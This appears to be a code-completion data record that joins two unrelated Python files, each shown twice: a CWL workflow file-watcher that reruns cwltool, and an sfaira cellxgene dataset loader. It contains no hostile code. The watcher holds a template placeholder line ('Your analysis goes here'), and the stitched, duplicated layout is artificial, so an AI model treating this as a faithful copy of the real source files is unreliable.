except FileNotFoundError as e:
# The file may not exist yet.
print(e)
# NOTE: You should be very careful when using file watchers! Most libraries
# (watchdog, watchfiles, etc) will use operating system / platform-specific
# APIs to check for changes (for performance reasons). However, this can cause
# problems in some cases, specifically for network drives.
# See https://stackoverflow.com/questions/45441623/using-watchdog-of-python-to-monitoring-afp-shared-folder-from-linux
# I'm 99% sure the same problem happens with Docker containers. Either way, the
# solution is to use polling. However, for unknown reasons, simply replacing
# Observer with PollingObserver doesn't seem to work! So we are forced to write
# our own basic file watcher using glob.
"""class SubprocessHandler(PatternMatchingEventHandler):
def __init__(self, cmd: List[str], cachedir_path: str, cwl_tool: str, args_vals: Json, tools_cwl: Tools, **kwargs: Any) -> None:
self.cmd = cmd
self.lock = False
self.cachedir_path = cachedir_path
self.cwl_tool = cwl_tool
self.args_vals = args_vals
self.tools_cwl = tools_cwl
super().__init__(**kwargs)
def on_any_event(self, event: FileSystemEvent) -> None:
# Use a lock to prevent us from DOS'ing ourselves
global lock
if event.event_type == 'modified' and not lock:
directory = Path(event._src_path).parent
print('directory', directory)
#self.lock = True
print(event)
rerun_cwltool(directory, self.cachedir_path, self.cwl_tool, self.args_vals, self.tools_cwl)
#self.lock = False"""
def file_watcher_glob(cachedir_path: Path, pattern: str, prev_files: Dict[str, float]) -> Dict[str, float]:
"""Determines whether files (specified by the given glob pattern) have been either recently created or modified.\n
Note that this is a workaround due to an issue with using standard file-watching libraries.
Args:
cachedir_path (Path): The --cachedir directory of the main workflow.
pattern (str): The glob pattern which specifies the files to be watched.
prev_files (Dict[str, float]): This should be the return value from the previous function call.
Returns:
Dict[str, float]: A dictionary containing the filepaths and last modification times.
"""
changed_files = {}
file_pattern = str(cachedir_path / f'**/{pattern}')
file_paths = glob.glob(file_pattern, recursive=True)
for file in file_paths:
time = os.path.getmtime(file)
if file not in prev_files:
# created
changed_files[file] = time
elif time > prev_files[file]:
# modified
changed_files[file] = time
return changed_files
def main() -> None:
print('cwl_watcher sys.argv', sys.argv)
# TODO: check that 1,3,5, are --cachedir_path, --file_pattern, --cwl_tool
# or switch to argparse
cachedir_path = Path(sys.argv[2])
file_pattern = sys.argv[4].strip()
cwl_tool = sys.argv[6]
max_times = int(sys.argv[8])
# Create an empty 'logfile' so that cwl_watcher.cwl succeeds.
# TODO: Maybe capture cwl_tool stdout/stderr and redirect to this logfile.
logfile = Path(f'{cwl_tool}_only.log')
logfile.touch()
# Parse config into CWL input args
config = sys.argv[10]
args_vals = json.loads(config)
# This really needs to be args.cwl_dir, where args comes from the original
# command line, i.e. we can't just use dummy args.
cwl_dir = cachedir_path.parent
tools_cwl = get_tools_cwl(cwl_dir)
yml_paths = get_yml_paths(cwl_dir) # TODO: Use cwl_dir for now, but should be yml_dir
# Perform initialization (This is not ideal)
compiler.inference_rules = dict(utils.read_lines_pairs(cachedir_path.parent / 'inference_rules.txt'))
inference.renaming_conventions = utils.read_lines_pairs(cachedir_path.parent / 'renaming_conventions.txt')
# Generate schemas for validation
validator = wic_schema.get_validator(tools_cwl, list(yml_paths))
cachedir_hash_path = Path('.').absolute()
print('cachedir_hash_path', cachedir_hash_path)
"""cmd: List[str] = ['cwltool', '--cachedir', cachedir_path, f'{cachedir_hash_path}/{cwl_tool}_only.cwl', f'{cachedir_hash_path}/{cwl_tool}_only_inputs.yml']
event_handler = SubprocessHandler(cmd, cachedir_path, cwl_tool, args_vals, tools_cwl, patterns=[file_pattern])
observer = PollingObserver() # This does not work!
observer.schedule(event_handler, cachedir_path, recursive=True)
observer.start()"""
# Specify a maximum number of iterations to guarantee termination.
# Total runtime will be (sleep time + compile time + run time) * max_iters
# For now, there is no way to estimate max_iters such that polling will end
# around the same time as the original workflow step.
# TODO: Generate a file when the original workflow step finishes, and look
# for that file here to terminate. Keep max_iters just in case.
iter = 0
prev_files: Dict[str, float] = {}
try:
while iter < max_times:
# Use our own polling file watcher, see above.
changed_files = file_watcher_glob(cachedir_path, file_pattern, prev_files)
for file in changed_files:
if file_pattern[1:] in file:
print(file)
rerun_cwltool(Path(file).parent, cachedir_path, cwl_tool , args_vals, tools_cwl, yml_paths, validator)
prev_files = {**prev_files, **changed_files}
time.sleep(1.0) # Wait at least 1 second so we don't just spin.
iter += 1
except KeyboardInterrupt:
pass
#observer.stop()
#observer.join()
failed = False # Your analysis goes here
if failed:
print(f'{cwl_tool} failed!')
sys.exit(1)
if __name__ == "__main__":
main() | import glob
import os
from pathlib import Path
import subprocess as sub
import sys
import time
from typing import Any, Dict, List
from unittest.mock import patch
import graphviz
import networkx as nx
import json
from jsonschema import Draft202012Validator
"""from watchdog.observers import Observer
from watchdog.observers.polling import PollingObserver
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler"""
from .wic_types import GraphReps, Tools, YamlTree, Json, GraphData
from .main import get_tools_cwl, get_yml_paths
from .schemas import wic_schema
from . import ast, cli, compiler, inference, utils
def absolute_paths(json: Json, cachedir_path: Path) -> Json:
"""Recursively searches for paths in json and makes them absolute by prepending cachedir_path.
Args:
json (Json): The contents of the YAML cwl_watcher config: tag.
cachedir_path (Path): The --cachedir directory of the main workflow.
Returns:
Json: The contents of the YAML cwl_watcher config: tag, with all paths prepended with cachedir_path.
"""
new_json: Json = {}
for key, val in json.items():
if isinstance(val, Dict):
new_val = absolute_paths(val, cachedir_path)
else:
new_val = val
# TODO: Improve this heuristic
if 'input' in key and 'path' in key:
new_val = str(cachedir_path / val) # type: ignore
changed_files = file_watcher_glob(cachedir_path, val, {})
# We require unique filenames, so there should only be one file.
# TODO: check
for file in changed_files:
new_val = str(Path(file).absolute()) # type: ignore
new_json[key] = new_val
return new_json
def rerun_cwltool(directory_realtime: Path, cachedir_path: Path, cwl_tool: str,
args_vals: Json, tools_cwl: Tools, yml_paths: Dict[str, Path],
validator: Draft202012Validator) -> None:
"""This will speculatively execute cwltool for real-time analysis purposes.\n
It will NOT check for return code 0. See docs/userguide.md
Args:
directory_realtime (Path): The working directory of the main workflow. Currently unused to avoid this workflow from overwriting files from the main workflow (which by design will likely be running concurrently with this code).
cachedir_path (Path): The --cachedir directory of the main workflow.
cwl_tool (str): The CWL CommandLineTool or YAML filename (without extension).
args_vals (Json): The contents of the YAML cwl_watcher config: tag.
tools_cwl (Tools): The CWL CommandLineTool definitions found using get_tools_cwl()
yml_paths (Dict[str, Path]): The yml workflow definitions found using get_yml_paths()
validator (Draft202012Validator): Used to validate the \*.yml files against the autogenerated schema.
"""
try:
# Make paths in arguments absolute w.r.t the realtime directory. See below.
args_vals_new = absolute_paths(args_vals, cachedir_path)
# Construct a single-step workflow and add its arguments
#import yaml
if Path(cwl_tool).suffix == '.yml':
yaml_path = cwl_tool
root_yaml_tree = {'wic': {'steps': {f'(1, {cwl_tool})': {'wic': {'steps': args_vals_new}}}}, 'steps': [{cwl_tool: None}]}
#print('root_yaml_tree')
#print(yaml.dump(root_yaml_tree))
yaml_tree_raw = ast.read_AST_from_disk(YamlTree(yaml_path, root_yaml_tree), yml_paths, tools_cwl, validator)
yaml_tree = ast.merge_yml_trees(yaml_tree_raw, {}, tools_cwl)
yml = yaml_tree.yml
else:
yml = {'steps': [{cwl_tool: args_vals_new}]}
#print('yml')
#print(yml)
#print(yaml.dump(yml))
# Measure compile time
time_initial = time.time()
# Setup dummy args
testargs = ['wic', '--yaml', '', '--cwl_output_intermediate_files', 'True'] # ignore --yaml
# For now, we need to enable --cwl_output_intermediate_files. See comment in compiler.py
with patch.object(sys, 'argv', testargs):
args = cli.parser.parse_args()
yaml_path = f'{cwl_tool}_only.yml'
yaml_tree = YamlTree(yaml_path, yml)
subgraph = GraphReps(graphviz.Digraph(name=yaml_path), nx.DiGraph(), GraphData(yaml_path))
compiler_info = compiler.compile_workflow(yaml_tree, args, [], [subgraph], {}, {}, tools_cwl, True, relative_run_path=False)
rose_tree = compiler_info.rose
working_dir = Path('.') # Use a new working directory.
# Can also use `directory_realtime` at the risk of overwriting other files.
utils.write_to_disk(rose_tree, working_dir, relative_run_path=False)
time_final = time.time()
print(f'compile time for {cwl_tool}: {round(time_final - time_initial, 4)} seconds')
# NOTE: Since we are running cwltool 'within' cwltool, the inner
# cwltool command will get run from working_dir, but then cwl_tool
# will run within some other hashed directory in .../cachedir/
# The solution is to modify the input paths above to be absolute.
# The easiest way to do this for now is recompiling. This adds a few
# seconds, but most of the time will be CWL validation and runtime.
# Alternatively, we could try to compile once in main() and then
# make the paths absolute in f'{cwl_tool}_only_inputs.yml' here.
cmd: List[str] = ['cwltool', '--cachedir', str(cachedir_path), f'{cwl_tool}_only.cwl', f'{cwl_tool}_only_inputs.yml']
#proc = sub.run(self.cmd, cwd=working_dir)
#cmd = self.cmd
print('Running', cmd)
proc = sub.run(cmd, cwd=working_dir)
print('inner cwltool completed')
# Don't check the return code because the file may not exist yet, or
# because speculative execution may fail for any number of reasons.
# proc.check_returncode()
except FileNotFoundError as e:
# The file may not exist yet.
print(e)
# NOTE: You should be very careful when using file watchers! Most libraries
# (watchdog, watchfiles, etc) will use operating system / platform-specific
# APIs to check for changes (for performance reasons). However, this can cause
# problems in some cases, specifically for network drives.
# See https://stackoverflow.com/questions/45441623/using-watchdog-of-python-to-monitoring-afp-shared-folder-from-linux
# I'm 99% sure the same problem happens with Docker containers. Either way, the
# solution is to use polling. However, for unknown reasons, simply replacing
# Observer with PollingObserver doesn't seem to work! So we are forced to write
# our own basic file watcher using glob.
"""class SubprocessHandler(PatternMatchingEventHandler):
def __init__(self, cmd: List[str], cachedir_path: str, cwl_tool: str, args_vals: Json, tools_cwl: Tools, **kwargs: Any) -> None:
self.cmd = cmd
self.lock = False
self.cachedir_path = cachedir_path
self.cwl_tool = cwl_tool
self.args_vals = args_vals
self.tools_cwl = tools_cwl
super().__init__(**kwargs)
def on_any_event(self, event: FileSystemEvent) -> None:
# Use a lock to prevent us from DOS'ing ourselves
global lock
if event.event_type == 'modified' and not lock:
directory = Path(event._src_path).parent
print('directory', directory)
#self.lock = True
print(event)
rerun_cwltool(directory, self.cachedir_path, self.cwl_tool, self.args_vals, self.tools_cwl)
#self.lock = False"""
def file_watcher_glob(cachedir_path: Path, pattern: str, prev_files: Dict[str, float]) -> Dict[str, float]:
"""Determines whether files (specified by the given glob pattern) have been either recently created or modified.\n
Note that this is a workaround due to an issue with using standard file-watching libraries.
Args:
cachedir_path (Path): The --cachedir directory of the main workflow.
pattern (str): The glob pattern which specifies the files to be watched.
prev_files (Dict[str, float]): This should be the return value from the previous function call.
Returns:
Dict[str, float]: A dictionary containing the filepaths and last modification times.
"""
changed_files = {}
file_pattern = str(cachedir_path / f'**/{pattern}')
file_paths = glob.glob(file_pattern, recursive=True)
for file in file_paths:
time = os.path.getmtime(file)
if file not in prev_files:
# created
changed_files[file] = time
elif time > prev_files[file]:
# modified
changed_files[file] = time
return changed_files
def main() -> None:
print('cwl_watcher sys.argv', sys.argv)
# TODO: check that 1,3,5, are --cachedir_path, --file_pattern, --cwl_tool
# or switch to argparse
cachedir_path = Path(sys.argv[2])
file_pattern = sys.argv[4].strip()
cwl_tool = sys.argv[6]
max_times = int(sys.argv[8])
# Create an empty 'logfile' so that cwl_watcher.cwl succeeds.
# TODO: Maybe capture cwl_tool stdout/stderr and redirect to this logfile.
logfile = Path(f'{cwl_tool}_only.log')
logfile.touch()
# Parse config into CWL input args
config = sys.argv[10]
args_vals = json.loads(config)
# This really needs to be args.cwl_dir, where args comes from the original
# command line, i.e. we can't just use dummy args.
cwl_dir = cachedir_path.parent
tools_cwl = get_tools_cwl(cwl_dir)
yml_paths = get_yml_paths(cwl_dir) # TODO: Use cwl_dir for now, but should be yml_dir
# Perform initialization (This is not ideal)
compiler.inference_rules = dict(utils.read_lines_pairs(cachedir_path.parent / 'inference_rules.txt'))
inference.renaming_conventions = utils.read_lines_pairs(cachedir_path.parent / 'renaming_conventions.txt')
# Generate schemas for validation
validator = wic_schema.get_validator(tools_cwl, list(yml_paths))
cachedir_hash_path = Path('.').absolute()
print('cachedir_hash_path', cachedir_hash_path)
"""cmd: List[str] = ['cwltool', '--cachedir', cachedir_path, f'{cachedir_hash_path}/{cwl_tool}_only.cwl', f'{cachedir_hash_path}/{cwl_tool}_only_inputs.yml']
event_handler = SubprocessHandler(cmd, cachedir_path, cwl_tool, args_vals, tools_cwl, patterns=[file_pattern])
observer = PollingObserver() # This does not work!
observer.schedule(event_handler, cachedir_path, recursive=True)
observer.start()"""
# Specify a maximum number of iterations to guarantee termination.
# Total runtime will be (sleep time + compile time + run time) * max_iters
# For now, there is no way to estimate max_iters such that polling will end
# around the same time as the original workflow step.
# TODO: Generate a file when the original workflow step finishes, and look
# for that file here to terminate. Keep max_iters just in case.
iter = 0
prev_files: Dict[str, float] = {}
try:
while iter < max_times:
# Use our own polling file watcher, see above.
changed_files = file_watcher_glob(cachedir_path, file_pattern, prev_files)
for file in changed_files:
if file_pattern[1:] in file:
print(file)
rerun_cwltool(Path(file).parent, cachedir_path, cwl_tool , args_vals, tools_cwl, yml_paths, validator)
prev_files = {**prev_files, **changed_files}
time.sleep(1.0) # Wait at least 1 second so we don't just spin.
iter += 1
except KeyboardInterrupt:
pass
#observer.stop()
#observer.join()
failed = False # Your analysis goes here
if failed:
print(f'{cwl_tool} failed!')
sys.exit(1)
if __name__ == "__main__":
main() |
import anndata
from IPython.display import display_javascript, display_html
import json
import os
import pathlib
import pickle
import requests
from typing import List, Union
import uuid
from sfaira.data.dataloaders.base import DatasetBase
from sfaira.consts import AdataIdsCellxgene, AdataIdsCellxgene_v2_0_0
from sfaira.consts.directories import CACHE_DIR_DATABASES_CELLXGENE
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import get_collection, get_data
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import CELLXGENE_PRODUCTION_ENDPOINT, DOWNLOAD_DATASET
def cellxgene_fn(dir, dataset_id):
return os.path.join(dir, dataset_id + ".h5ad")
def clean_cellxgene_meta_obs(k, val, adata_ids) -> Union[str, List[str]]:
"""
:param k: Found meta data name.
:param val: Found meta data entry.
:returns: Cleaned meta data entry.
"""
if k == "disease":
# TODO normal state label varies in disease annotation. This can be removed once streamlined.
val = ["healthy" if (v.lower() == "normal" or v.lower() == "healthy") else v for v in val]
elif k == "organ":
# Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
val = [v.split(" ")[0] for v in val]
elif k == "organism":
# TODO deprecate map once same organism naming is used.
organism_map = {
"Homo sapiens": "human",
"Mus musculus": "mouse",
}
val = [organism_map[v] if v in organism_map.keys() else v for v in val]
return val
def clean_cellxgene_meta_uns(k, val, adata_ids) -> Union[str, List[str]]:
"""
:param k: Found meta data name.
:param val: Found meta data entry.
:returns: Cleaned meta data entry.
"""
x_clean = []
for v in val:
if k == "sex":
v = v[0]
else:
# Decide if labels are read from name or ontology ID:
if k == "disease" and (v["label"].lower() == "normal" or v["label"].lower() == "healthy"):
# TODO normal state label varies in disease annotation. This can be removed once streamlined.
v = "healthy"
elif k in ["assay_sc", "disease", "organ"] and \
v["ontology_term_id"] != adata_ids.unknown_metadata_identifier:
v = v["ontology_term_id"]
else:
v = v["label"]
# Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
if k == "organ":
v = v.split(" ")[0]
if k == "organism":
# TODO deprecate map once same organism naming is used.
organism_map = {
"Homo sapiens": "human",
"Mus musculus": "mouse"}
v = organism_map[v] if v in organism_map.keys() else v
if v != adata_ids.unknown_metadata_identifier and v != adata_ids.invalid_metadata_identifier:
x_clean.append(v)
return x_clean
class Dataset(DatasetBase):
"""
This is a dataloader for downloaded h5ad from cellxgene.
In contrast to the base class, each instance is coupled to a particular collection_id to allow query.
In the base classes, collection_id are only defined on the group level.
"""
collection_id: str
def __init__(
self,
collection_id: str = "default",
data_path: Union[str, None] = None,
meta_path: Union[str, None] = None,
cache_path: Union[str, None] = None,
load_func=None,
dict_load_func_annotation=None,
yaml_path: Union[str, None] = None,
sample_fn: Union[str, None] = None,
sample_fns: Union[List[str], None] = None,
additional_annotation_key: Union[str, None] = None,
verbose: int = 0,
**kwargs
):
super().__init__(
data_path=data_path,
meta_path=meta_path,
cache_path=cache_path,
load_func=load_func,
sample_fn=sample_fn,
sample_fns=sample_fns,
)
# General keys are defined in the shared IDs object. Further down, the species specific one is loaded to
# disambiguate species-dependent differences.
self._adata_ids_cellxgene = AdataIdsCellxgene()
self._collection = None
self.collection_id = collection_id
self.supplier = "cellxgene"
doi = [x['link_url'] for x in self.collection["links"] if x['link_type'] == 'DOI']
self.doi_journal = collection_id if len(doi) == 0 else doi[0] # TODO access journal DOI explicitly.
self.id = sample_fn
# Set h5ad download URLs:
download_url_data = []
for asset in self._collection_dataset['dataset_assets']:
if asset['filetype'].lower() == "h5ad":
download_url_data.append(CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] +
"/asset/" + asset['id'])
self.download_url_data = download_url_data
# Set dataset-wise attributes based on object preview from REST API (without h5ad download):
# Set organism first so that other terms can access this attribute (e.g. developmental_stage ontology).
reordered_keys = ["organism"] + [x for x in self._adata_ids_cellxgene.dataset_keys if x != "organism"]
for k in reordered_keys:
val = self._collection_dataset[getattr(self._adata_ids_cellxgene, k)]
# Unique label if list is length 1:
# Otherwise do not set property and resort to cell-wise labels.
if isinstance(val, dict) or k == "sex":
val = [val]
v_clean = clean_cellxgene_meta_uns(k=k, val=val, adata_ids=self._adata_ids_cellxgene)
try:
# Set as single element or list if multiple entries are given.
if len(v_clean) == 1:
setattr(self, k, v_clean[0])
else:
setattr(self, k, v_clean)
except ValueError as e:
if verbose > 0:
print(f"WARNING: {e} in {self.collection_id} and data set {self.id}")
if self.organism == "human":
self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
elif self.organism == "mouse":
self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
else:
assert False, self.organism
# Add author information. # TODO need to change this to contributor?
setattr(self, "author", "cellxgene")
# The h5ad objects from cellxgene follow a particular structure and the following attributes are guaranteed to
# be in place. Note that these point at the anndata instance and will only be available for evaluation after
# download. See below for attributes that are lazily available
self.cell_type_obs_key = self._adata_ids_cellxgene.cell_type
self.development_stage_obs_key = self._adata_ids_cellxgene.development_stage
self.disease_obs_key = self._adata_ids_cellxgene.disease
self.ethnicity_obs_key = self._adata_ids_cellxgene.ethnicity
self.sex_obs_key = self._adata_ids_cellxgene.sex
self.organ_obs_key = self._adata_ids_cellxgene.organism
self.state_exact_obs_key = self._adata_ids_cellxgene.state_exact
self.gene_id_symbols_var_key = self._adata_ids_cellxgene.feature_symbol
self._unknown_celltype_identifiers = self._adata_ids_cellxgene.unknown_metadata_identifier
@property
def _collection_cache_dir(self):
"""
The cache dir is in a cache directory in the sfaira installation that is excempt from git versioning.
"""
cache_dir_path = pathlib.Path(CACHE_DIR_DATABASES_CELLXGENE)
cache_dir_path.mkdir(parents=True, exist_ok=True)
return CACHE_DIR_DATABASES_CELLXGENE
@property
def _collection_cache_fn(self):
return os.path.join(self._collection_cache_dir, self.collection_id + ".pickle")
@property
def collection(self):
if self._collection is None:
# Check if cached:
if os.path.exists(self._collection_cache_fn):
with open(self._collection_cache_fn, "rb") as f:
self._collection = pickle.load(f)
else:
# Download and cache:
self._collection = get_collection(collection_id=self.collection_id)
with open(self._collection_cache_fn, "wb") as f:
pickle.dump(obj=self._collection, file=f)
return self._collection
@property
def _collection_dataset(self):
return self.collection['datasets'][self._sample_fns.index(self.sample_fn)]
@property
def directory_formatted_doi(self) -> str:
return self.collection_id
@property
def doi_cleaned_id(self):
return self.id
def load(
self,
remove_gene_version: bool = True,
match_to_reference: Union[str, bool, None] = None,
load_raw: bool = False,
allow_caching: bool = True,
set_metadata: bool = True,
**kwargs
):
# Invoke load with cellxgene adapted parameters:
# - Never cache as the cellxgene objects already fast to read.
super().load(
remove_gene_version=False,
match_to_reference=match_to_reference,
load_raw=True,
allow_caching=False,
set_metadata=set_metadata,
adata_ids=self._adata_ids_cellxgene,
**kwargs
)
def download(self, filetype: str = "h5ad", verbose: int = 0):
"""
Only download if file does not already exist.
:param filetype: File type to download.
- "h5ad"
- "rds"
- "loom"
"""
counter = 0
if not os.path.exists(os.path.join(self.data_dir_base, self.directory_formatted_doi)):
os.makedirs(os.path.join(self.data_dir_base, self.directory_formatted_doi))
for asset in self._collection_dataset['dataset_assets']:
if asset['filetype'].lower() == filetype:
# Only download if file does not already exist:
fn = cellxgene_fn(dir=self.data_dir, dataset_id=self.sample_fn)
if not os.path.isfile(fn):
counter += 1
assert counter < 2, f"found more than one {filetype} for data set {self.sample_fn}"
url = CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] + "/asset/" + \
asset['id']
r = requests.post(url)
r.raise_for_status()
presigned_url = r.json()['presigned_url']
# Report:
headers = {'range': 'bytes=0-0'}
r1 = requests.get(presigned_url, headers=headers)
if r1.status_code == requests.codes.partial:
if verbose > 0:
print(f"Downloading {r1.headers["Content-Range"]} from {r1.headers["Server"]}")
# Download:
open(fn, 'wb').write(get_data(presigned_url=presigned_url))
def show_summary(self):
uuid_session = str(uuid.uuid4())
display_html('<div id="{}" style="height: 600px; width:100%;"></div>'.format(uuid_session), raw=True)
display_javascript("""
require(["https://rawgit.com/caldwell/renderjson/master/renderjson.js"], function() {
document.getElementById('%s').appendChild(renderjson(%s))
});
""" % (uuid_session, json.dumps(self._collection_dataset)), raw=True)
def load(data_dir, sample_fn, adata_ids: AdataIdsCellxgene, **kwargs):
"""
Generalised load function for cellxgene-provided data sets.
This function corresponds to the dataset-wise load() functions defined in standard sfaira data loaders.
"""
fn = cellxgene_fn(dir=data_dir, dataset_id=sample_fn)
adata = anndata.read_h5ad(fn)
if adata.raw is not None: # TODO still need this?
adata.X = adata.raw.X
del adata.raw
for k in adata_ids.ontology_constrained:
col_name = getattr(adata_ids, k)
if col_name in adata.obs.columns:
adata.obs[col_name] = clean_cellxgene_meta_obs(k=k, val=adata.obs[col_name].values, adata_ids=adata_ids)
return adata
| import anndata
from IPython.display import display_javascript, display_html
import json
import os
import pathlib
import pickle
import requests
from typing import List, Union
import uuid
from sfaira.data.dataloaders.base import DatasetBase
from sfaira.consts import AdataIdsCellxgene, AdataIdsCellxgene_v2_0_0
from sfaira.consts.directories import CACHE_DIR_DATABASES_CELLXGENE
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import get_collection, get_data
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import CELLXGENE_PRODUCTION_ENDPOINT, DOWNLOAD_DATASET
def cellxgene_fn(dir, dataset_id):
return os.path.join(dir, dataset_id + ".h5ad")
def clean_cellxgene_meta_obs(k, val, adata_ids) -> Union[str, List[str]]:
"""
:param k: Found meta data name.
:param val: Found meta data entry.
:returns: Cleaned meta data entry.
"""
if k == "disease":
# TODO normal state label varies in disease annotation. This can be removed once streamlined.
val = ["healthy" if (v.lower() == "normal" or v.lower() == "healthy") else v for v in val]
elif k == "organ":
# Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
val = [v.split(" ")[0] for v in val]
elif k == "organism":
# TODO deprecate map once same organism naming is used.
organism_map = {
"Homo sapiens": "human",
"Mus musculus": "mouse",
}
val = [organism_map[v] if v in organism_map.keys() else v for v in val]
return val
def clean_cellxgene_meta_uns(k, val, adata_ids) -> Union[str, List[str]]:
"""
:param k: Found meta data name.
:param val: Found meta data entry.
:returns: Cleaned meta data entry.
"""
x_clean = []
for v in val:
if k == "sex":
v = v[0]
else:
# Decide if labels are read from name or ontology ID:
if k == "disease" and (v["label"].lower() == "normal" or v["label"].lower() == "healthy"):
# TODO normal state label varies in disease annotation. This can be removed once streamlined.
v = "healthy"
elif k in ["assay_sc", "disease", "organ"] and \
v["ontology_term_id"] != adata_ids.unknown_metadata_identifier:
v = v["ontology_term_id"]
else:
v = v["label"]
# Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
if k == "organ":
v = v.split(" ")[0]
if k == "organism":
# TODO deprecate map once same organism naming is used.
organism_map = {
"Homo sapiens": "human",
"Mus musculus": "mouse"}
v = organism_map[v] if v in organism_map.keys() else v
if v != adata_ids.unknown_metadata_identifier and v != adata_ids.invalid_metadata_identifier:
x_clean.append(v)
return x_clean
class Dataset(DatasetBase):
"""
This is a dataloader for downloaded h5ad from cellxgene.
In contrast to the base class, each instance is coupled to a particular collection_id to allow query.
In the base classes, collection_id are only defined on the group level.
"""
collection_id: str
def __init__(
self,
collection_id: str = "default",
data_path: Union[str, None] = None,
meta_path: Union[str, None] = None,
cache_path: Union[str, None] = None,
load_func=None,
dict_load_func_annotation=None,
yaml_path: Union[str, None] = None,
sample_fn: Union[str, None] = None,
sample_fns: Union[List[str], None] = None,
additional_annotation_key: Union[str, None] = None,
verbose: int = 0,
**kwargs
):
super().__init__(
data_path=data_path,
meta_path=meta_path,
cache_path=cache_path,
load_func=load_func,
sample_fn=sample_fn,
sample_fns=sample_fns,
)
# General keys are defined in the shared IDs object. Further down, the species specific one is loaded to
# disambiguate species-dependent differences.
self._adata_ids_cellxgene = AdataIdsCellxgene()
self._collection = None
self.collection_id = collection_id
self.supplier = "cellxgene"
doi = [x['link_url'] for x in self.collection["links"] if x['link_type'] == 'DOI']
self.doi_journal = collection_id if len(doi) == 0 else doi[0] # TODO access journal DOI explicitly.
self.id = sample_fn
# Set h5ad download URLs:
download_url_data = []
for asset in self._collection_dataset['dataset_assets']:
if asset['filetype'].lower() == "h5ad":
download_url_data.append(CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] +
"/asset/" + asset['id'])
self.download_url_data = download_url_data
# Set dataset-wise attributes based on object preview from REST API (without h5ad download):
# Set organism first so that other terms can access this attribute (e.g. developmental_stage ontology).
reordered_keys = ["organism"] + [x for x in self._adata_ids_cellxgene.dataset_keys if x != "organism"]
for k in reordered_keys:
val = self._collection_dataset[getattr(self._adata_ids_cellxgene, k)]
# Unique label if list is length 1:
# Otherwise do not set property and resort to cell-wise labels.
if isinstance(val, dict) or k == "sex":
val = [val]
v_clean = clean_cellxgene_meta_uns(k=k, val=val, adata_ids=self._adata_ids_cellxgene)
try:
# Set as single element or list if multiple entries are given.
if len(v_clean) == 1:
setattr(self, k, v_clean[0])
else:
setattr(self, k, v_clean)
except ValueError as e:
if verbose > 0:
print(f"WARNING: {e} in {self.collection_id} and data set {self.id}")
if self.organism == "human":
self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
elif self.organism == "mouse":
self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
else:
assert False, self.organism
# Add author information. # TODO need to change this to contributor?
setattr(self, "author", "cellxgene")
# The h5ad objects from cellxgene follow a particular structure and the following attributes are guaranteed to
# be in place. Note that these point at the anndata instance and will only be available for evaluation after
# download. See below for attributes that are lazily available
self.cell_type_obs_key = self._adata_ids_cellxgene.cell_type
self.development_stage_obs_key = self._adata_ids_cellxgene.development_stage
self.disease_obs_key = self._adata_ids_cellxgene.disease
self.ethnicity_obs_key = self._adata_ids_cellxgene.ethnicity
self.sex_obs_key = self._adata_ids_cellxgene.sex
self.organ_obs_key = self._adata_ids_cellxgene.organism
self.state_exact_obs_key = self._adata_ids_cellxgene.state_exact
self.gene_id_symbols_var_key = self._adata_ids_cellxgene.feature_symbol
self._unknown_celltype_identifiers = self._adata_ids_cellxgene.unknown_metadata_identifier
@property
def _collection_cache_dir(self):
"""
The cache dir is in a cache directory in the sfaira installation that is excempt from git versioning.
"""
cache_dir_path = pathlib.Path(CACHE_DIR_DATABASES_CELLXGENE)
cache_dir_path.mkdir(parents=True, exist_ok=True)
return CACHE_DIR_DATABASES_CELLXGENE
@property
def _collection_cache_fn(self):
return os.path.join(self._collection_cache_dir, self.collection_id + ".pickle")
@property
def collection(self):
if self._collection is None:
# Check if cached:
if os.path.exists(self._collection_cache_fn):
with open(self._collection_cache_fn, "rb") as f:
self._collection = pickle.load(f)
else:
# Download and cache:
self._collection = get_collection(collection_id=self.collection_id)
with open(self._collection_cache_fn, "wb") as f:
pickle.dump(obj=self._collection, file=f)
return self._collection
@property
def _collection_dataset(self):
return self.collection['datasets'][self._sample_fns.index(self.sample_fn)]
@property
def directory_formatted_doi(self) -> str:
return self.collection_id
@property
def doi_cleaned_id(self):
return self.id
def load(
self,
remove_gene_version: bool = True,
match_to_reference: Union[str, bool, None] = None,
load_raw: bool = False,
allow_caching: bool = True,
set_metadata: bool = True,
**kwargs
):
# Invoke load with cellxgene adapted parameters:
# - Never cache as the cellxgene objects already fast to read.
super().load(
remove_gene_version=False,
match_to_reference=match_to_reference,
load_raw=True,
allow_caching=False,
set_metadata=set_metadata,
adata_ids=self._adata_ids_cellxgene,
**kwargs
)
def download(self, filetype: str = "h5ad", verbose: int = 0):
"""
Only download if file does not already exist.
:param filetype: File type to download.
- "h5ad"
- "rds"
- "loom"
"""
counter = 0
if not os.path.exists(os.path.join(self.data_dir_base, self.directory_formatted_doi)):
os.makedirs(os.path.join(self.data_dir_base, self.directory_formatted_doi))
for asset in self._collection_dataset['dataset_assets']:
if asset['filetype'].lower() == filetype:
# Only download if file does not already exist:
fn = cellxgene_fn(dir=self.data_dir, dataset_id=self.sample_fn)
if not os.path.isfile(fn):
counter += 1
assert counter < 2, f"found more than one {filetype} for data set {self.sample_fn}"
url = CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] + "/asset/" + \
asset['id']
r = requests.post(url)
r.raise_for_status()
presigned_url = r.json()['presigned_url']
# Report:
headers = {'range': 'bytes=0-0'}
r1 = requests.get(presigned_url, headers=headers)
if r1.status_code == requests.codes.partial:
if verbose > 0:
